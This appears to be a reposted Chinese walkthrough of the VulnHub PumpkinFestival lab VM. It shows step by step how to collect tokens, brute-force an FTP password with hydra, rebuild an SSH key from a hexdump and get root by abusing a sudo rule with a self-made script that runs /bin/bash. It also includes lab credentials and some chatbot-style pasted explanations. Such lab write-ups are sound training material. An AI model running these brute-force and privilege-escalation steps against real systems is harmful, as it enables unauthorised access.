PumpkinFestival靶机详解

news2024/12/23 7:42:59

靶机下载地址

https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/

靶机配置

主机发现

arp-scan -l

端口扫描

nmap -sS -Pn -A -p- -n 192.168.229.163

访问网页

http://192.168.229.163/

这些可能是用户名和账号留存

F12查看页面源码,发现一个token值

45d9ee7239bc6b0bb21d3f8e1c5faa52

目录扫描

dirsearch -u "http://192.168.229.163:80"

拼接访问

http://192.168.229.163/robots.txt

访问tokens时,权限被拒绝,可能存在文件,尝试访问token.txt,得到第二个 token

http://192.168.229.163/tokens/token.txt

PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea

查看到track.txt,得到一串值和一个邮箱

http://192.168.229.163/store/track.txt

看到 local ,可能需要绑定hosts,在 hosts 中写入

echo 192.168.229.163 pumpkins.local >> hosts

访问pumpkins.local

第三个token

http://pumpkins.local/

PumpkinToken : 06c3eb12ef2389e2752335beccfb2080

kali对http://pumpkins.local/进行目录扫描

需要修改/etc/hosts文件添加以下内容

192.168.229.163 pumpkins.local

wpscan 是一个开源的 WordPress 漏洞扫描工具,可以帮助你发现 WordPress 网站的漏洞和安全问题。

以下是 wpscan 的一些主要功能:

  1. 枚举 WordPress 网站的插件和主题。
  2. 检查 WordPress 核心版本是否存在已知的漏洞。
  3. 扫描 WordPress 插件和主题是否存在已知的漏洞。
  4. 提供 WordPress 网站的配置信息,如 WordPress 版本、PHP 版本等。
  5. 检测 WordPress 主题和插件的版本信息泄露。
  6. 检测 WordPress 网站是否存在已知的安全问题和漏洞。

使用 wpscan 可以帮助你评估 WordPress 网站的安全性,并采取相应的措施来修复已知的漏洞。

wpscan --url http://pumpkins.local -e at -e ap -e u

扫描到两个用户

发现两个可用网页

http://pumpkins.local/readme.html

解码网站

https://icyberchef.com/#recipe=From_Base62('0-9A-Za-z')&input=SzgydjBTdXZWMUVuMzUwTTB1eGlYVlJUbUJyUUlKUU43OHM

得到以下数据

morse & jack : Ug0t!TrIpyJ

访问网站,morse登录,密码:Ug0t!TrIpyJ

http://pumpkins.local/wp-admin

找到第四个token

PumpkinToken : 7139e925fd43618653e51f820bc6201b

之前 wpscan 扫描时,扫描到一个admin用户,尝试登录失败,密码,试试之前80端口看到的 Alohomora! ,登录成功,发现第五个token

admin:Alohomora!
http://pumpkins.local/wp-admin/post.php?post=23&action=edit

PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4

ftp匿名登录,FTP:FTP

ls
cd secret
get token.txt

查看下载下的token.txt文件

得到第六个token

PumpkinToken : 2d6dbbae84d724409606eddd9dd71265

目前还剩harry用户密码没有获取,用hydra破解

hydra -l harry -P /usr/share/wordlists/rockyou.txt 192.168.229.163 ftp -e nsr

得到账户和密码

harry
yrrah

登录 ftp ,发现 token.txt

查看token.txt获得第七个token

ftp 192.168.229.163

ls
get token.txt

PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e

继续cd到目录内查看

发现第8个token

PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c

GETshell

继续cd打开发现data.txt文件,下载后打开发现是乱码

查看文件类型

file data.txt

tar vxf data.txt
tar xjf data
tar vxf key
cat jack

你提供的命令是不同的 tar 命令来解压文件,最后使用 cat 命令来分析一个文件。以下是这些命令的解释:

  1. tar vxf data.txt
    • 使用 tar 解压文件 data.txtv 表示显示详细信息,x 表示解压,f 表示指定文件名为 data.txt。不过通常情况下,.txt 文件并不是一个压缩包的格式,可能这里是误写了文件扩展名。
  1. tar xjf data
    • 使用 tar 解压一个 .bz2 格式的压缩包(j 代表 bzip2),文件名为 data
  1. tar vxf key
    • 解压名为 key 的文件并显示详细信息。这里并未给出文件扩展名,系统会尝试识别格式。
  1. cat jack
    • 使用 cat 命令查看或输出 jack 文件的内容。

如果你需要进一步分析这些文件,或者遇到了什么问题,告诉我具体情况,我可以帮助你

使用 xxd 将 hexdump 转换,得到一个私钥(有问题)

sudo apt-get update 
sudo apt-get install xxd 
 
更新不成功记得换源
sudo vim /etc/apt/sources.list
 
用#把默认官方源注释掉,再加上中科大的的url:
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
具体请看
https://blog.csdn.net/weixin_46136890/article/details/124910871
 
xxd -r -p jack

复制内容到aaa并赋予其600权限

在 Kali Linux(或其他 Linux 发行版)中,可以使用多个命令将一个文件的内容复制到另一个文件中。以下是几种常用的方法:

方法 1:使用 cp 命令

如果你想简单地将一个文件的全部内容复制到另一个文件,可以使用 cp 命令:

bash


复制代码
cp source_file destination_file

例如:

bash


复制代码
cp file1.txt file2.txt

这将会把 file1.txt 的内容复制到 file2.txt,如果 file2.txt 已经存在,它会被覆盖。

方法 2:使用重定向 >>>

你也可以使用重定向符号将一个文件的内容写入到另一个文件:

  1. 覆盖写入:使用 >source_file 的内容复制到 destination_file,并覆盖目标文件的内容:
bash


复制代码
cat source_file > destination_file
  1. 追加写入:使用 >>source_file 的内容追加到 destination_file 的末尾,而不会覆盖已有的内容:

bash


复制代码
cat source_file >> destination_file

方法 3:使用 tee 命令

tee 命令可以读取文件并同时将输出写入多个文件。以下是将文件内容复制到另一个文件的用法:

bash


复制代码
cat source_file | tee destination_file

这与使用 > 类似,tee 会将 source_file 的内容复制到 destination_file

方法 4:使用 dd 命令

dd 命令也可以用于复制文件内容,不过它通常用于更低级别的复制操作:

bash


复制代码
dd if=source_file of=destination_file

使用 xxd 将 hexdump 转换,得到一个私钥并将结果导入bbb文件

sudo apt-get update 
sudo apt-get install xxd 
 
更新不成功记得换源
sudo vim /etc/apt/sources.list
 
用#把默认官方源注释掉,再加上中科大的的url:
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
具体请看
https://blog.csdn.net/weixin_46136890/article/details/124910871
 
xxd -r -p jack > bbb

赋予bbb600权限

chmod 600 bbb

ssh连接

ssh -i bbb jack@192.168.229.163 -p6880

提权

sudo -l 发现需要密码,先往后做

sudo -l

找到token文件,发现是乱码

ls
cat token

查看文件类型,发现是可执行文件

file token

你提供的 token 信息描述了一个 ELF(Executable and Linkable Format)文件的元数据。以下是对这些字段的解释:

  • setuid:这个标志意味着文件具有 setuid 位设置。当文件被执行时,它将以文件所有者的权限运行,而不是以当前用户的权限运行。对于安全性来说,setuid 文件需要特别注意。
  • ELF 64-bit:文件是一个 64 位的 ELF 可执行文件。ELF 是 Linux 和其他类 Unix 系统上常见的可执行文件格式。
  • LSB (Least Significant Bit) executable:指文件是小端字节序格式存储的,意味着较低位字节存储在较低地址(典型的 x86-64 处理器架构使用小端格式)。
  • x86-64:文件适用于 x86-64 架构,这是常见的 64 位处理器架构,如 Intel 和 AMD 的现代 CPU。
  • version 1 (SYSV):表示这是一个符合 System V ABI 的文件,这是 Unix 系统上常见的应用二进制接口。
  • dynamically linked (uses shared libs):可执行文件是动态链接的,这意味着它在运行时需要链接一些共享库(动态库)。这些共享库通常是系统中已安装的库。
  • for GNU/Linux 2.6.24:该可执行文件适用于 Linux 2.6.24 及其更新版本。
  • BuildID[sha1]=977c5f4023cb5e77599fd8194089aa03f155ad88:这是一个文件的 Build ID,它通过 SHA-1 散列生成,唯一标识该二进制文件。用于调试或崩溃报告中的符号查找。
  • stripped:该可执行文件已被 "剥离"(stripped),这意味着文件中的符号表和调试信息已被移除,以减小文件大小或出于安全考虑。调试这个文件可能会比较困难。

你可以使用 file 命令来查看文件的这些详细信息,例如:

bash


复制代码
file token

如果你需要对这个 ELF 文件进行进一步分析,比如调试、反汇编等,可以使用工具如 objdumpreadelfgdb。如果是检查安全风险,建议对 setuid 文件进行权限管理或进一步审查。

执行命令

得到第九个token

./token

PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706

没有找到密码,使用之前的密码试试,发现是Ug0t!TrIpyJ

sudo -l

发现在/home/jack/pumpkins/alohomora*拥有sudo权限,没有就创造出该目录和文件,并赋予权限,执行alohomora

mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash
 
chmod 777 alohomora
sudo ./alohomora

查看是否提权成功

id
whoami

提权成功

找到最后一个文件

cd /root
ls
cat PumpkinFestival_Ticket

补充一下遗漏的第十个token

dirsearch目录扫描

python dirsearch.py -u "http://pumpkins.local"

http://pumpkins.local/license.txt

PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2143990.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

瑞芯微RK3588开发板Linux系统添加自启动命令的方法,深圳触觉智能Arm嵌入式鸿蒙硬件方案商

本文适用于触觉智能所有Linux系统的开发板、主板添加自启动命令的方法,本次使用了触觉智能的EVB3588开发板演示,搭载了瑞芯微RK3588旗舰芯片。 该开发板为核心板加底板设计,为工业场景设计研发的模块化产品,10年以上稳定供货,帮助…

2024年9月18日历史上的今天大事件早读

1043年9月18日 范仲淹实行改革 1393年9月18日 “活财神”沈万三逝世 1783年9月18日 瑞士著名数学家欧拉逝世 1851年9月18日 《纽约时报》创刊 1903年9月18日 清末爱国将领冯子材逝世 1917年9月18日 护法战争爆发 1931年9月18日 “九一八”事变爆发 1936年9月18日 阎锡山…

SOMEIP_ETS_115: SD_Entry_references_more_options_than_exist

测试目的: 验证DUT能够拒绝一个订阅请求,该请求中的选项引用超出了实际存在的选项数量,并以SubscribeEventgroupNAck作为响应。 描述 本测试用例旨在确保DUT遵循SOME/IP协议,当接收到一个引用了比实际存在的更多选项的Subscrib…

SPI中的CPOL和CPHA

SPI中的CPOL和CPHA学习SPI必须掌握的知识,因为它涉及到“数据位采集”。重点掌握空闲时SCK的电平是怎么定义的。采集时,是怎么规定发生在哪个时钟边沿。CPOL用来决定SPI总线在空闲时,SPI_SCK引脚输出的电平;CPHA用来决定“数据位采集点”发生在第几边沿。…

【Python】从基础到进阶(八):文件操作与上下文管理

🔥 个人主页:空白诗 文章目录 一、引言二、Python文件操作基础1. 打开文件2. 读取文件3. 写入文件4. 文件指针定位 三、上下文管理1. 使用with管理文件2. 自定义上下文管理器 四、文件操作的最佳实践五、案例:日志文件管理1. 需求分析2. 实现…

低代码技术:简化应用开发的未来

近年来,低代码技术作为一种新兴的应用开发方法,受到了广泛关注。低代码平台通过图形化的界面和预设的模块,使得用户能够以较少的代码编写工作创建应用程序。这一技术的发展,标志着软件开发过程中的一个重要变革。 低代码技术的基…

【Linux系统编程】第二十弹---进程优先级 命令行参数 环境变量

✨个人主页: 熬夜学编程的小林 💗系列专栏: 【C语言详解】 【数据结构详解】【C详解】【Linux系统编程】 目录 1、进程优先级 2.1、什么是优先级 2.2、优先级的描述 2.3、优先级与权限的关系 2.4、为什么要有优先级 2.5、Linux优先级的…

【产品更新】中汇保函及汇匠源保证金保函平台

中汇保函 新增 1.新增小程序查询验证功能,手机输入即可查验。 2.新增小程序客户案例案例,合作单位及案例展示页面。 3.履约保函、预付款保函、质量保函、工程款支付保函订单提交及订单状态查验。 4.PC产品官网已经上线,可随时访问了解产品介…

【Java】synchronized 基础线程安全

欢迎浏览高耳机的博客 希望我们彼此都有更好的收获 感谢三连支持! 在多线程编程中,线程安全是一个至关重要的概念。Java 提供了多种机制来处理线程安全问题,其中 synchronized 关键字是最常用和最基础的一种。本文将介绍线程安全问题的原因&a…

智创未来,景联文科技提供全方位数据采集服务

随着科技的日新月异,人工智能技术正在改变我们的生活与工作方式,数据成为推动人工智能(AI)技术发展的基石。 高质量的数据对于训练机器学习模型、提升算法性能以及实现智能应用的广泛部署至关重要。 景联文科技凭借卓越的技术实力…

Android14请求动态申请存储权限

Android14请求动态申请存储权限 Android14和Android15存储权限有增加多了选择部分,还是全部。一个小小的存储权限真的被它玩出了花来。本来Android13就将存储权限进行了3个细分,是图片,音频还是视频文件。 步骤一:AndroidManife…

六种主流ETL工具的比较与Kettle的实践练习指南--MySQL、hive、hdfs等之间的数据迁移

在数据集成和数据仓库建设中,ETL(Extract, Transform, Load)工具扮演着至关重要的角色。本文将对六种主流ETL工具进行比较,并深入探讨Kettle的实践应用。 一、六种主流ETL工具比较 1. DataPipeline 设计及架构:专为…

Python异常处理:自定义异常②

文章目录 1. 什么是自定义异常?2. 为什么需要自定义异常?3. 如何定义自定义异常?3.1 基本自定义异常3.2 带详细信息的自定义异常3.3 自定义异常的继承层次 4. 使用自定义异常4.1 抛出自定义异常4.2 捕获自定义异常 5. 自定义异常的应用场景5.…

【C++】透析string类

个人主页:CSDN_小八哥向前冲~ 所属专栏:C入门 目录 string类介绍 auto和范围for auto关键字 范围for string类常用接口说明 string类常见构造 string类容量操作 string类的访问及遍历操作 string类修改操作 string的结构说明 vs下的结构 G下的…

LibJPEG库使用_通过LibJPEG将RGB数据保存为JPG图片存储到磁盘

一、前言 LibJPEG库是一个广泛使用的开源C库,用于处理JPEG图像的压缩和解压缩。该库由独立JPEG小组(Independent JPEG Group, IJG)开发,提供了功能强大的API,用于创建和读取JPEG文件。LibJPEG库支持JPEG的所有常见功能…

Cpp快速入门语法(上)(1)

文章目录 前言一、C关键字(C98)二、命名空间命名空间的定义命名空间的使用 三、C输入 & 输出四、缺省参数总结 前言 其实有时候我也会尝试代入下祖师爷本杰明当年在贝尔实验室的心理活动,我心想,他可能一开始是大抵受不了C语言的某些缺点&#xff0c…

梦想之家|AI技术赋能家居,重塑生活空间

人工智能(AI)在智能家居方面的应用非常广泛,极大地提升了家庭的便利性、安全性和能源效率。当前,AI技术的迅速发展,为传统家居产品带来了智能化升级。从智能单品到智能互联,AI技术的融入使得这些家居产品具…

DC-DC降压10A电源降压可调模块24V转12V9V5V3V-AH1514芯片

AH1514:一款高效率小体积的DC-DC降压电源芯片 摘要:本文介绍了一款高性能的DC-DC降压电源芯片——AH1514,该芯片具有24V转12V、9V、5V、3V可调输出,支持7V-38V输入,20A峰值输出电流,且具有小体积、高效率的…

C++速通LeetCode简单第19题-只出现一次的数字

方法一&#xff1a;暴力求解&#xff0c;排序后两个两个比较&#xff0c;两者不同时前者为答案&#xff1a; class Solution { public:int singleNumber(vector<int>& nums) {if(nums.size() 1) return nums[0];list<int> l;int ans 0;for(int i 0;i< n…